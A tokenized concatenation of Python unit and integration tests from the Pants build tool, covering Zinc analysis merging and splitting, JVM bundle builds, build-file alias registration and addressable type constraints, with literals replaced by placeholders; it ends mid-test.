<EOL> self . assertTrue ( merged_analysis . is_equal_to ( merged_analysis2 ) , '<STR_LIT>' . join ( <EOL> [ six . u ( diff ) for diff in diffs ] ) ) <EOL> diffs = expected_merged_analysis . diff ( merged_analysis2 ) <EOL> self . assertTrue ( expected_merged_analysis . is_equal_to ( merged_analysis2 ) , '<STR_LIT>' . join ( <EOL> [ six . u ( diff ) for diff in diffs ] ) ) <EOL> sources_per_analysis = [ a . stamps . sources . keys ( ) for a in analyses ] <EOL> split_analyses = self . _time ( lambda : merged_analysis2 . split ( <EOL> sources_per_analysis , catchall = True ) , <EOL> '<STR_LIT>' % num_analyses ) <EOL> self . assertEquals ( num_analyses + <NUM_LIT:1> , len ( split_analyses ) ) <EOL> catchall_analysis = split_analyses [ - <NUM_LIT:1> ] <EOL> self . assertEquals ( <NUM_LIT:0> , len ( catchall_analysis . stamps . sources ) ) <EOL> splits_dir = os . path . join ( testdir , b'<STR_LIT>' ) <EOL> os . mkdir ( splits_dir ) <EOL> for analysis_file , analysis , split_analysis in zip ( analysis_files , analyses , split_analyses ) : <EOL> outfile_path = os . path . join ( splits_dir , os . path . basename ( analysis_file ) ) <EOL> split_analysis . write_to_path ( outfile_path ) <EOL> diffs = analysis . diff ( split_analysis ) <EOL> self . assertTrue ( analysis . is_equal_to ( split_analysis ) , <EOL> '<STR_LIT>' . join ( [ six . u ( diff ) for diff in diffs ] ) ) <EOL> print ( '<STR_LIT>' % self . total_time ) <EOL> def _generate_testworthy_splits ( self ) : <EOL> """<STR_LIT>""" <EOL> original_splits_dir = os . environ . get ( _TEST_DATA_SOURCE_ENV_VAR ) <EOL> canonical_dir = os . path . join ( original_splits_dir , '<STR_LIT>' ) <EOL> if os . path . exists ( canonical_dir ) : <EOL> shutil . rmtree ( canonical_dir , True ) <EOL> os . mkdir ( canonical_dir ) <EOL> original_split_filenames = [ f . decode ( '<STR_LIT:utf-8>' ) for f in os . listdir ( original_splits_dir ) ] <EOL> original_splits_files = [ os . path . join ( original_splits_dir , f ) <EOL> for f in original_split_filenames if f . endswith ( '<STR_LIT>' ) ] <EOL> parser = ZincAnalysisParser ( ) <EOL> original_split_analyses = [ parser . parse_from_path ( f ) for f in original_splits_files ] <EOL> merged_analysis = ZincAnalysis . merge ( original_split_analyses ) <EOL> merged_analysis . write_to_path ( os . path . join ( canonical_dir , '<STR_LIT>' ) ) <EOL> sources_per_analysis = [ a . stamps . sources . keys ( ) for a in original_split_analyses ] <EOL> split_analyses = merged_analysis . split ( sources_per_analysis , os . path . dirname ( __file__ ) ) <EOL> for original_split_file , split_analysis in zip ( original_splits_files , split_analyses ) : <EOL> outpath = os . path . join ( canonical_dir , os . path . basename ( original_split_file ) ) <EOL> split_analysis . write_to_path ( outpath ) <EOL> print ( '<STR_LIT>' . format ( canonical_dir ) ) <EOL> class ZincAnalysisTestLarge ( ZincAnalysisTestBase ) : <EOL> def test_large ( self ) : <EOL> parser = ZincAnalysisParser ( ) <EOL> with _temp_test_dir ( '<STR_LIT>' ) as testdir : <EOL> print ( '<STR_LIT>' . format ( testdir ) ) <EOL> analysis_file_names = [ b'<STR_LIT>' , b'<STR_LIT>' ] <EOL> analysis_files = [ os . path . join ( testdir , f ) for f in analysis_file_names ] <EOL> def msg ( prefix ) : <EOL> return '<STR_LIT>' . format ( prefix , '<STR_LIT:U+002CU+0020>' . join ( analysis_file_names ) ) <EOL> analyses = self . _time ( lambda : [ parser . parse_from_path ( f ) for f in analysis_files ] , <EOL> msg ( '<STR_LIT>' ) ) <EOL> writeout_dir = os . path . join ( testdir , b'<STR_LIT>' ) <EOL> os . mkdir ( writeout_dir ) <EOL> def write ( file_name , analysis ) : <EOL> outpath = os . path . join ( writeout_dir , file_name ) <EOL> analysis . write_to_path ( outpath ) <EOL> def _write_all ( ) : <EOL> for analysis_file , analysis in zip ( analysis_files , analyses ) : <EOL> write ( os . path . basename ( analysis_file ) , analysis ) <EOL> self . _time ( _write_all , msg ( '<STR_LIT>' ) ) <EOL> merged_analysis = self . _time ( lambda : ZincAnalysis . merge ( analyses ) , msg ( '<STR_LIT>' ) ) <EOL> merged_analysis_path = os . path . join ( testdir , b'<STR_LIT>' ) <EOL> self . _time ( lambda : merged_analysis . write_to_path ( merged_analysis_path ) , msg ( '<STR_LIT>' ) ) <EOL> sources_per_analysis = [ a . stamps . sources . keys ( ) for a in analyses ] <EOL> self . _time ( lambda : merged_analysis . split ( sources_per_analysis , catchall = True ) , msg ( '<STR_LIT>' ) ) <EOL> rebased_analysis_path = os . path . join ( testdir , b'<STR_LIT>' ) <EOL> self . _time ( lambda : ZincAnalysisParser ( ) . rebase_from_path ( merged_analysis_path , rebased_analysis_path , <EOL> b'<STR_LIT>' , b'<STR_LIT>' ) , msg ( '<STR_LIT>' ) ) <EOL> print ( '<STR_LIT>' % self . total_time ) <EOL> class ZincAnalysisTestSorting ( ZincAnalysisTestBase ) : <EOL> class FakeElement ( ZincAnalysisElement ) : <EOL> headers = ( '<STR_LIT:foo>' , ) <EOL> def test_sort ( self ) : <EOL> unsorted_arg = { '<STR_LIT:{}>' . format ( n ) : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] for n in range ( <NUM_LIT:9> , - <NUM_LIT:1> , - <NUM_LIT:1> ) } <EOL> expected = ( '<STR_LIT>' + <EOL> '<STR_LIT>' . join ( '<STR_LIT>' . format ( n = n ) for n in range ( <NUM_LIT:0> , <NUM_LIT:10> ) ) ) <EOL> def do_test ( elem ) : <EOL> for n in range ( <NUM_LIT:0> , <NUM_LIT:9> ) : <EOL> self . assertEquals ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , elem . args [ <NUM_LIT:0> ] [ '<STR_LIT:{}>' . format ( n ) ] ) <EOL> buf = StringIO . StringIO ( ) <EOL> elem . write ( buf ) <EOL> output = buf . getvalue ( ) <EOL> self . assertMultiLineEqual ( expected , output ) <EOL> always_sorted_elem = self . FakeElement ( [ unsorted_arg ] , always_sort = True ) <EOL> do_test ( always_sorted_elem ) <EOL> with environment_as ( ZINCUTILS_SORTED_ANALYSIS = '<STR_LIT:1>' ) : <EOL> unsorted_elem = self . FakeElement ( [ unsorted_arg ] ) <EOL> do_test ( unsorted_elem ) </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> import os <EOL> import subprocess <EOL> from contextlib import contextmanager <EOL> from shutil import rmtree <EOL> from pants . base . build_environment import get_buildroot <EOL> from pants_test . pants_run_integration_test import PantsRunIntegrationTest <EOL> class Bundles ( object ) : <EOL> """<STR_LIT>""" <EOL> phrase_path = '<STR_LIT>' <EOL> bundle_dir_prefix = '<STR_LIT>' <EOL> class Bundle ( object ) : <EOL> def __init__ ( self , spec , text ) : <EOL> self . spec = spec <EOL> self . text = text <EOL> def __hash__ ( self ) : <EOL> return hash ( ( self . spec , self . text ) ) <EOL> @ property <EOL> def full_spec ( self ) : <EOL> return '<STR_LIT>' . format ( project = Bundles . phrase_path , name = self . spec ) <EOL> lesser_of_two = Bundle ( '<STR_LIT>' , <EOL> "<STR_LIT>" ) <EOL> once_upon_a_time = Bundle ( '<STR_LIT>' , <EOL> "<STR_LIT>" ) <EOL> ten_thousand = Bundle ( '<STR_LIT>' , <EOL> "<STR_LIT>" ) <EOL> there_was_a_duck = Bundle ( '<STR_LIT>' , <EOL> "<STR_LIT>" ) <EOL> all_bundles = [ lesser_of_two , once_upon_a_time , ten_thousand , there_was_a_duck ] <EOL> class BundleIntegrationTest ( PantsRunIntegrationTest ) : <EOL> """<STR_LIT>""" <EOL> def _bundle_path ( self , bundle ) : <EOL> return os . path . join ( get_buildroot ( ) , '<STR_LIT>' , <EOL> '<STR_LIT>' . format ( prefix = Bundles . bundle_dir_prefix , <EOL> name = bundle ) ) <EOL> @ contextmanager <EOL> def _handle_bundles ( self , names ) : <EOL> """<STR_LIT>""" <EOL> paths = [ self . _bundle_path ( name ) for name in names ] <EOL> jars = [ '<STR_LIT>' . format ( name = name ) for name in names ] <EOL> yield ( paths , jars ) <EOL> missing = [ ] <EOL> for path in paths : <EOL> if os . path . exists ( path ) : <EOL> rmtree ( path ) <EOL> else : <EOL> missing . append ( path ) <EOL> self . assertFalse ( missing , "<STR_LIT>" <EOL> . format ( missing = '<STR_LIT:U+002CU+0020>' . join ( missing ) ) ) <EOL> def _test_bundle_existences ( self , args , bundles , config = None ) : <EOL> all_bundles = set ( bundle . spec for bundle in Bundles . all_bundles ) <EOL> all_paths = [ self . _bundle_path ( bundle ) for bundle in all_bundles ] <EOL> names = [ bundle . spec for bundle in bundles ] <EOL> outputs = [ bundle . text for bundle in bundles ] <EOL> for path in all_paths : <EOL> if os . path . exists ( path ) : <EOL> rmtree ( path ) <EOL> with self . _handle_bundles ( names ) as ( paths , jars ) : <EOL> with self . pants_results ( [ '<STR_LIT>' ] + args , config = config ) as pants_run : <EOL> self . assert_success ( pants_run ) <EOL> for path , jar , expected in zip ( paths , jars , outputs ) : <EOL> java_run = subprocess . Popen ( [ '<STR_LIT>' , '<STR_LIT>' , jar ] , <EOL> stdout = subprocess . PIPE , <EOL> cwd = path ) <EOL> java_retcode = java_run . wait ( ) <EOL> java_out = java_run . stdout . read ( ) <EOL> self . assertEquals ( java_retcode , <NUM_LIT:0> ) <EOL> self . assertTrue ( expected in java_out , "<STR_LIT>" <EOL> . format ( output = expected , jar = jar , stdout = java_out ) ) <EOL> lingering = [ path for path in all_paths if os . path . exists ( path ) ] <EOL> self . assertTrue ( not lingering , "<STR_LIT>" <EOL> . format ( bundles = '<STR_LIT:U+002CU+0020>' . join ( lingering ) ) ) <EOL> def test_single_run ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _test_bundle_existences ( <EOL> [ Bundles . lesser_of_two . full_spec ] , <EOL> [ Bundles . lesser_of_two ] , <EOL> ) <EOL> def test_double_run ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _test_bundle_existences ( <EOL> [ Bundles . lesser_of_two . full_spec , Bundles . once_upon_a_time . full_spec ] , <EOL> [ Bundles . lesser_of_two , Bundles . once_upon_a_time ] , <EOL> ) <EOL> def test_all_run ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _test_bundle_existences ( <EOL> [ Bundles . phrase_path + '<STR_LIT>' ] , <EOL> Bundles . all_bundles , <EOL> ) <EOL> def test_exclude_lesser ( self ) : <EOL> self . _test_bundle_existences ( <EOL> [ Bundles . phrase_path + '<STR_LIT>' , '<STR_LIT>' ] , <EOL> set ( Bundles . all_bundles ) - { Bundles . lesser_of_two } , <EOL> ) <EOL> def test_exclude_thoe ( self ) : <EOL> self . _test_bundle_existences ( <EOL> [ Bundles . phrase_path + '<STR_LIT>' , r'<STR_LIT>' , ] , <EOL> set ( Bundles . all_bundles ) - { Bundles . there_was_a_duck , Bundles . ten_thousand } , <EOL> ) <EOL> def test_exclude_two ( self ) : <EOL> self . _test_bundle_existences ( [ <EOL> Bundles . phrase_path + '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> set ( Bundles . all_bundles ) - { Bundles . there_was_a_duck , Bundles . once_upon_a_time } , <EOL> ) </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> import os <EOL> import unittest <EOL> from contextlib import contextmanager <EOL> from pants . base . build_file import BuildFile <EOL> from pants . base . file_system_project_tree import FileSystemProjectTree <EOL> from pants . build_graph . build_configuration import BuildConfiguration <EOL> from pants . build_graph . build_file_aliases import BuildFileAliases , TargetMacro <EOL> from pants . build_graph . target import Target <EOL> from pants . util . contextutil import temporary_dir <EOL> from pants . util . dirutil import touch <EOL> class BuildConfigurationTest ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . build_configuration = BuildConfiguration ( ) <EOL> def _register_aliases ( self , ** kwargs ) : <EOL> self . build_configuration . register_aliases ( BuildFileAliases ( ** kwargs ) ) <EOL> def test_register_bad ( self ) : <EOL> with self . assertRaises ( TypeError ) : <EOL> self . build_configuration . register_aliases ( <NUM_LIT> ) <EOL> def test_register_target_alias ( self ) : <EOL> class Fred ( Target ) : <EOL> pass <EOL> self . _register_aliases ( targets = { '<STR_LIT>' : Fred } ) <EOL> aliases = self . build_configuration . registered_aliases ( ) <EOL> self . assertEqual ( { } , aliases . target_macro_factories ) <EOL> self . assertEqual ( { } , aliases . objects ) <EOL> self . assertEqual ( { } , aliases . context_aware_object_factories ) <EOL> self . assertEqual ( dict ( fred = Fred ) , aliases . target_types ) <EOL> with self . _create_mock_build_file ( '<STR_LIT>' ) as build_file : <EOL> parse_state = self . build_configuration . initialize_parse_state ( build_file ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( parse_state . registered_addressable_instances ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( parse_state . parse_globals ) ) <EOL> target_call_proxy = parse_state . parse_globals [ '<STR_LIT>' ] <EOL> target_call_proxy ( name = '<STR_LIT>' ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( parse_state . registered_addressable_instances ) ) <EOL> name , target_proxy = parse_state . registered_addressable_instances . pop ( ) <EOL> self . assertEqual ( '<STR_LIT>' , target_proxy . addressed_name ) <EOL> self . assertEqual ( Fred , target_proxy . addressed_type ) <EOL> def test_register_target_macro_facory ( self ) : <EOL> class Fred ( Target ) : <EOL> pass <EOL> class FredMacro ( TargetMacro ) : <EOL> def __init__ ( self , parse_context ) : <EOL> self . _parse_context = parse_context <EOL> def expand ( self , * args , ** kwargs ) : <EOL> return self . _parse_context . create_object ( Fred , name = '<STR_LIT>' , dependencies = [ kwargs [ '<STR_LIT:name>' ] ] ) <EOL> class FredFactory ( TargetMacro . Factory ) : <EOL> @ property <EOL> def target_types ( self ) : <EOL> return { Fred } <EOL> def macro ( self , parse_context ) : <EOL> return FredMacro ( parse_context ) <EOL> factory = FredFactory ( ) <EOL> self . _register_aliases ( targets = { '<STR_LIT>' : factory } ) <EOL> aliases = self . build_configuration . registered_aliases ( ) <EOL> self . assertEqual ( { } , aliases . target_types ) <EOL> self . assertEqual ( { } , aliases . objects ) <EOL> self . assertEqual ( { } , aliases . context_aware_object_factories ) <EOL> self . assertEqual ( dict ( fred = factory ) , aliases . target_macro_factories ) <EOL> with self . _create_mock_build_file ( '<STR_LIT>' ) as build_file : <EOL> parse_state = self . build_configuration . initialize_parse_state ( build_file ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( parse_state . registered_addressable_instances ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( parse_state . parse_globals ) ) <EOL> target_call_proxy = parse_state . parse_globals [ '<STR_LIT>' ] <EOL> target_call_proxy ( name = '<STR_LIT>' ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( parse_state . registered_addressable_instances ) ) <EOL> name , target_proxy = parse_state . registered_addressable_instances . pop ( ) <EOL> self . assertEqual ( '<STR_LIT>' , target_proxy . addressed_name ) <EOL> self . assertEqual ( Fred , target_proxy . addressed_type ) <EOL> self . assertEqual ( [ '<STR_LIT>' ] , target_proxy . dependency_specs ) <EOL> def test_register_exposed_object ( self ) : <EOL> self . _register_aliases ( objects = { '<STR_LIT>' : <NUM_LIT> } ) <EOL> aliases = self . build_configuration . registered_aliases ( ) <EOL> self . assertEqual ( { } , aliases . target_types ) <EOL> self . assertEqual ( { } , aliases . target_macro_factories ) <EOL> self . assertEqual ( { } , aliases . context_aware_object_factories ) <EOL> self . assertEqual ( dict ( jane = <NUM_LIT> ) , aliases . objects ) <EOL> with self . _create_mock_build_file ( '<STR_LIT>' ) as build_file : <EOL> parse_state = self . build_configuration . initialize_parse_state ( build_file ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( parse_state . registered_addressable_instances ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( parse_state . parse_globals ) ) <EOL> self . assertEqual ( <NUM_LIT> , parse_state . parse_globals [ '<STR_LIT>' ] ) <EOL> def test_register_exposed_context_aware_function ( self ) : <EOL> self . do_test_exposed_context_aware_function ( lambda context : lambda : context . rel_path ) <EOL> self . do_test_exposed_context_aware_function ( lambda context = None : lambda : context . rel_path ) <EOL> def george_method ( self , parse_context ) : <EOL> return lambda : parse_context . rel_path <EOL> def test_register_exposed_context_aware_method ( self ) : <EOL> self . do_test_exposed_context_aware_function ( self . george_method ) <EOL> @ classmethod <EOL> def george_classmethod ( cls , parse_context ) : <EOL> return lambda : parse_context . rel_path <EOL> def test_register_exposed_context_aware_classmethod ( self ) : <EOL> self . do_test_exposed_context_aware_function ( self . george_classmethod ) <EOL> @ staticmethod <EOL> def george_staticmethod ( parse_context ) : <EOL> return lambda : parse_context . rel_path <EOL> def test_register_exposed_context_aware_staticmethod ( self ) : <EOL> self . do_test_exposed_context_aware_function ( self . george_staticmethod ) <EOL> def do_test_exposed_context_aware_function ( self , func , * args , ** kwargs ) : <EOL> with self . do_test_exposed_context_aware_object ( func ) as context_aware_object : <EOL> self . assertEqual ( '<STR_LIT>' , context_aware_object ( * args , ** kwargs ) ) <EOL> def test_register_exposed_context_aware_class ( self ) : <EOL> class George ( object ) : <EOL> def __init__ ( self , parse_context ) : <EOL> self . _parse_context = parse_context <EOL> def honorific ( self ) : <EOL> return len ( self . _parse_context . rel_path ) <EOL> with self . do_test_exposed_context_aware_object ( George ) as context_aware_object : <EOL> self . assertEqual ( <NUM_LIT:6> , context_aware_object . honorific ( ) ) <EOL> @ contextmanager <EOL> def do_test_exposed_context_aware_object ( self , context_aware_object_factory ) : <EOL> self . _register_aliases ( context_aware_object_factories = { '<STR_LIT>' : context_aware_object_factory } ) <EOL> aliases = self . build_configuration . registered_aliases ( ) <EOL> self . assertEqual ( { } , aliases . target_types ) <EOL> self . assertEqual ( { } , aliases . target_macro_factories ) <EOL> self . assertEqual ( { } , aliases . objects ) <EOL> self . assertEqual ( dict ( george = context_aware_object_factory ) , <EOL> aliases . context_aware_object_factories ) <EOL> with temporary_dir ( ) as root : <EOL> build_file_path = os . path . join ( root , '<STR_LIT>' , '<STR_LIT>' ) <EOL> touch ( build_file_path ) <EOL> build_file = BuildFile ( FileSystemProjectTree ( root ) , '<STR_LIT>' ) <EOL> parse_state = self . build_configuration . initialize_parse_state ( build_file ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( parse_state . registered_addressable_instances ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( parse_state . parse_globals ) ) <EOL> yield parse_state . parse_globals [ '<STR_LIT>' ] <EOL> @ contextmanager <EOL> def _create_mock_build_file ( self , dirname ) : <EOL> with temporary_dir ( ) as root : <EOL> os . mkdir ( os . path . join ( root , dirname ) ) <EOL> touch ( os . path . join ( root , dirname , '<STR_LIT>' ) ) <EOL> yield BuildFile ( FileSystemProjectTree ( root ) , os . path . join ( dirname , '<STR_LIT>' ) ) </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> import unittest <EOL> from pants . engine . exp . addressable import ( Exactly , MutationError , NotSerializableError , <EOL> SubclassesOf , SuperclassesOf , TypeConstraintError , <EOL> addressable , addressable_dict , addressable_list ) <EOL> from pants . engine . exp . objects import Resolvable , Serializable <EOL> class TypeConstraintTestBase ( unittest . TestCase ) : <EOL> class A ( object ) : <EOL> pass <EOL> class B ( A ) : <EOL> pass <EOL> class C ( B ) : <EOL> pass <EOL> class BPrime ( A ) : <EOL> pass <EOL> class SuperclassesOfTest ( TypeConstraintTestBase ) : <EOL> def test_none ( self ) : <EOL> with self . assertRaises ( ValueError ) : <EOL> SubclassesOf ( ) <EOL> def test_single ( self ) : <EOL> superclasses_of_b = SuperclassesOf ( self . B ) <EOL> self . assertEqual ( ( self . B , ) , superclasses_of_b . types ) <EOL> self . assertTrue ( superclasses_of_b . satisfied_by ( self . A ( ) ) ) <EOL> self . assertTrue ( superclasses_of_b . satisfied_by ( self . B ( ) ) ) <EOL> self . assertFalse ( superclasses_of_b . satisfied_by ( self . BPrime ( ) ) ) <EOL> self . assertFalse ( superclasses_of_b . satisfied_by ( self . C ( ) ) ) <EOL> def test_multiple ( self ) : <EOL> superclasses_of_a_or_b = SuperclassesOf ( self . A , self . B ) <EOL> self . assertEqual ( ( self . A , self . B ) , superclasses_of_a_or_b . types ) <EOL> self . assertTrue ( superclasses_of_a_or_b . satisfied_by ( self . A ( ) ) ) <EOL> self . assertTrue ( superclasses_of_a_or_b . satisfied_by ( self . B ( ) ) ) <EOL> self . assertFalse ( superclasses_of_a_or_b . satisfied_by ( self . BPrime ( ) ) ) <EOL> self . assertFalse ( superclasses_of_a_or_b . satisfied_by ( self . C ( ) ) ) <EOL> class ExactlyTest ( TypeConstraintTestBase ) : <EOL> def test_none ( self ) : <EOL> with self . assertRaises ( ValueError ) : <EOL> Exactly ( ) <EOL> def test_single ( self ) : <EOL> exactly_b = Exactly ( self . B ) <EOL> self . assertEqual ( ( self . B , ) , exactly_b . types ) <EOL> self . assertFalse ( exactly_b . satisfied_by ( self . A ( ) ) ) <EOL> self . assertTrue ( exactly_b . satisfied_by ( self . B ( ) ) ) <EOL> self . assertFalse ( exactly_b . satisfied_by ( self . BPrime ( ) ) ) <EOL> self . assertFalse ( exactly_b . satisfied_by ( self . C ( ) ) ) <EOL> def test_multiple ( self ) : <EOL> exactly_a_or_b = Exactly ( self . A , self . B ) <EOL> self . assertEqual ( ( self . A , self . B ) , exactly_a_or_b . types ) <EOL> self . assertTrue ( exactly_a_or_b . satisfied_by ( self . A ( ) ) ) <EOL> self . assertTrue ( exactly_a_or_b . satisfied_by ( self . B ( ) ) ) <EOL> self . assertFalse ( exactly_a_or_b . satisfied_by ( self . BPrime ( ) ) ) <EOL> self . assertFalse ( exactly_a_or_b . satisfied_by ( self . C ( ) ) ) <EOL> class SubclassesOfTest ( TypeConstraintTestBase ) : <EOL> def test_none ( self ) : <EOL> with self . assertRaises ( ValueError ) : <EOL> SubclassesOf ( ) <EOL> def test_single ( self ) : <EOL> subclasses_of_b = SubclassesOf ( self . B ) <EOL> self . assertEqual ( ( self . B , ) , subclasses_of_b . types ) <EOL> self . assertFalse ( subclasses_of_b . satisfied_by ( self . A ( ) ) ) <EOL> self . assertTrue ( subclasses_of_b . satisfied_by ( self . B ( ) ) ) <EOL> self . assertFalse ( subclasses_of_b . satisfied_by ( self . BPrime ( ) ) ) <EOL> self . assertTrue ( subclasses_of_b . satisfied_by ( self . C ( ) ) ) <EOL> def test_multiple ( self ) : <EOL> subclasses_of_b_or_c = SubclassesOf ( self . B , self . C ) <EOL> self . assertEqual ( ( self . B , self . C ) , subclasses_of_b_or_c . types ) <EOL> self . assertTrue ( subclasses_of_b_or_c . satisfied_by ( self . B ( ) ) ) <EOL> self . assertTrue ( subclasses_of_b_or_c . satisfied_by ( self . C ( ) ) ) <EOL> self . assertFalse ( subclasses_of_b_or_c . satisfied_by ( self . BPrime ( ) ) ) <EOL> self . assertFalse ( subclasses_of_b_or_c . satisfied_by ( self . A ( ) ) ) <EOL> class SimpleSerializable ( Serializable ) : <EOL> def __init__ ( self , ** kwargs ) : <EOL> self . _kwargs = kwargs <EOL> def _asdict ( self ) : <EOL> return self . _kwargs <EOL> class CountingResolvable ( Resolvable ) : <EOL> def __init__ ( self , address , value ) : <EOL> self . _address = address <EOL> self . _value = value <EOL> self . _resolutions = <NUM_LIT:0> <EOL> @ property <EOL> def address ( self ) : <EOL> return self . _address <EOL> def resolve ( self ) : <EOL> try : <EOL> return self . _value <EOL> finally : <EOL> self . _resolutions += <NUM_LIT:1> <EOL> @ property <EOL> def resolutions ( self ) : <EOL> return self . _resolutions <EOL> class AddressableDescriptorTest ( unittest . TestCase ) : <EOL> def test_inappropriate_application ( self ) : <EOL> class NotSerializable ( object ) : <EOL> def __init__ ( self , count ) : <EOL> super ( NotSerializable , self ) . __init__ ( ) <EOL> self . count = count <EOL> @ addressable ( Exactly ( int ) ) <EOL> def count ( self ) : <EOL> pass <EOL> with self . assertRaises ( NotSerializableError ) : <EOL> NotSerializable ( <NUM_LIT> ) <EOL> class AddressableTest ( unittest . TestCase ) : <EOL> class Person ( SimpleSerializable ) : <EOL> def __init__ ( self , age ) : <EOL> super ( AddressableTest . Person , self ) . __init__ ( ) <EOL> self . age = age <EOL> @ addressable ( Exactly ( int ) ) <EOL> def age ( self ) : <EOL> """<STR_LIT>""" <EOL> def test_none ( self ) : <EOL> person = self . Person ( None ) <EOL> self . assertIsNone ( person . age , None ) <EOL> def test_value ( self ) : <EOL> person = self . Person ( <NUM_LIT> ) <EOL> self . assertEqual ( <NUM_LIT> , person . age ) <EOL> def test_address ( self ) : <EOL> person = self . Person ( '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' , person . age ) <EOL> def test_resolvable ( self ) : <EOL> resolvable_age = CountingResolvable ( '<STR_LIT>' , <NUM_LIT> ) <EOL> person = self . Person ( resolvable_age ) <EOL> self . assertEqual ( <NUM_LIT:0> , resolvable_age . resolutions ) <EOL> self . assertEqual ( <NUM_LIT> , person . age ) <EOL> self . assertEqual ( <NUM_LIT:1> , resolvable_age . resolutions ) <EOL> self . assertEqual ( <NUM_LIT> , person . age ) <EOL> self . assertEqual ( <NUM_LIT:2> , resolvable_age . resolutions ) <EOL> def test_type_mismatch_value ( self ) : <EOL> with self . assertRaises ( TypeConstraintError ) : <EOL> self . Person ( <NUM_LIT> ) <EOL> def test_type_mismatch_resolvable ( self ) : <EOL> resolvable_age = CountingResolvable ( '<STR_LIT>' , <NUM_LIT> ) <EOL> person = self . Person ( resolvable_age ) <EOL> with self . assertRaises ( TypeConstraintError ) : <EOL> person . age <EOL> def test_single_assignment ( self ) : <EOL> person = self . Person ( <NUM_LIT> ) <EOL> with self . assertRaises ( MutationError ) : <EOL> person . age = <NUM_LIT> <EOL> class AddressableListTest ( unittest . TestCase ) : <EOL> class Series ( SimpleSerializable ) : <EOL> def __init__ ( self , values ) : <EOL> super ( AddressableListTest . Series , self ) . __init__ ( ) <EOL> self . values = values <EOL> @ addressable_list ( Exactly ( int , float ) ) <EOL> def values ( self ) : <EOL> """<STR_LIT>""" <EOL> def test_none ( self ) : <EOL> series = self . Series ( None ) <EOL> self . assertEqual ( [ ] , series . values ) <EOL> def test_values ( self ) : <EOL> series = self . Series ( [ <NUM_LIT> , <NUM_LIT:1> / <NUM_LIT> ] ) <EOL> self . assertEqual ( [ <NUM_LIT> , <NUM_LIT:1> / <NUM_LIT> ] , series . values ) <EOL> def test_addresses ( self ) : <EOL> series = self . Series ( [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( [ '<STR_LIT>' ] , series . values ) <EOL> def test_resolvables ( self ) : <EOL> resolvable_value = CountingResolvable ( '<STR_LIT>' , <NUM_LIT:1> / <NUM_LIT> ) <EOL> series = self . Series ( [ resolvable_value ] ) <EOL> self . assertEqual ( [ <NUM_LIT:1> / <NUM_LIT> ] , series . values ) <EOL> self . assertEqual ( <NUM_LIT:1> , resolvable_value . resolutions ) <EOL> self . assertEqual ( <NUM_LIT:1> / <NUM_LIT> , series . values [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( <NUM_LIT:2> , resolvable_value . resolutions ) <EOL> def test_mixed ( self ) : <EOL> resolvable_value = CountingResolvable ( '<STR_LIT>' , <NUM_LIT:1> / <NUM_LIT> ) <EOL> series = self . Series ( [ <NUM_LIT> , '<STR_LIT>' , resolvable_value ] ) <EOL> self . assertEqual ( <NUM_LIT:0> , resolvable_value . resolutions ) <EOL> self . assertEqual ( [ <NUM_LIT> , '<STR_LIT>' , <NUM_LIT:1> / <NUM_LIT> ] , series . values ) <EOL> self . assertEqual ( <NUM_LIT:1> , resolvable_value . resolutions ) <EOL> self . assertEqual ( <NUM_LIT:1> / <NUM_LIT> , series . values [ <NUM_LIT:2> ] ) <EOL> self . assertEqual ( <NUM_LIT:2> , resolvable_value . resolutions ) <EOL> def test_type_mismatch_container ( self ) : <EOL> with self . assertRaises ( TypeError ) : <EOL> self . Series ( { <NUM_LIT> , <NUM_LIT:1> / <NUM_LIT> } ) <EOL> def test_type_mismatch_value ( self ) : <EOL> with self . assertRaises ( TypeConstraintError ) : <EOL> self . Series ( [ <NUM_LIT> , False ] ) <EOL> def test_type_mismatch_resolvable ( self ) : <EOL> resolvable_value = CountingResolvable ( '<STR_LIT>' , True ) <EOL> series = self . Series ( [ <NUM_LIT> , resolvable_value ] ) <EOL> with self . assertRaises ( TypeConstraintError ) : <EOL> series . values <EOL> def test_single_assignment ( self ) : <EOL> series = self . Series ( [ <NUM_LIT> ] ) <EOL> with self . assertRaises ( MutationError ) : <EOL> series . values = [ <NUM_LIT> ] <EOL> class AddressableDictTest ( unittest . TestCase ) : <EOL> class Varz ( SimpleSerializable ) : <EOL> def __init__ ( self , varz ) : <EOL> super ( AddressableDictTest . Varz , self ) . __init__ ( ) <EOL> self . varz = varz <EOL> @ addressable_dict ( Exactly ( int , float ) ) <EOL> def varz ( self ) : <EOL> """<STR_LIT>""" <EOL> def test_none ( self ) : <EOL> varz = self . Varz ( None ) <EOL> self . assertEqual ( { } , varz . varz ) <EOL> def test_values ( self ) : <EOL> varz = self . Varz ( { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> / <NUM_LIT> } ) <EOL> self . assertEqual ( { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> / <NUM_LIT> } , varz . varz ) <EOL> def test_addresses ( self ) : <EOL> varz = self . Varz ( { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertEqual ( { '<STR_LIT>' : '<STR_LIT>' } , varz . varz ) <EOL> def test_resolvables ( self ) : <EOL> resolvable_value = CountingResolvable ( 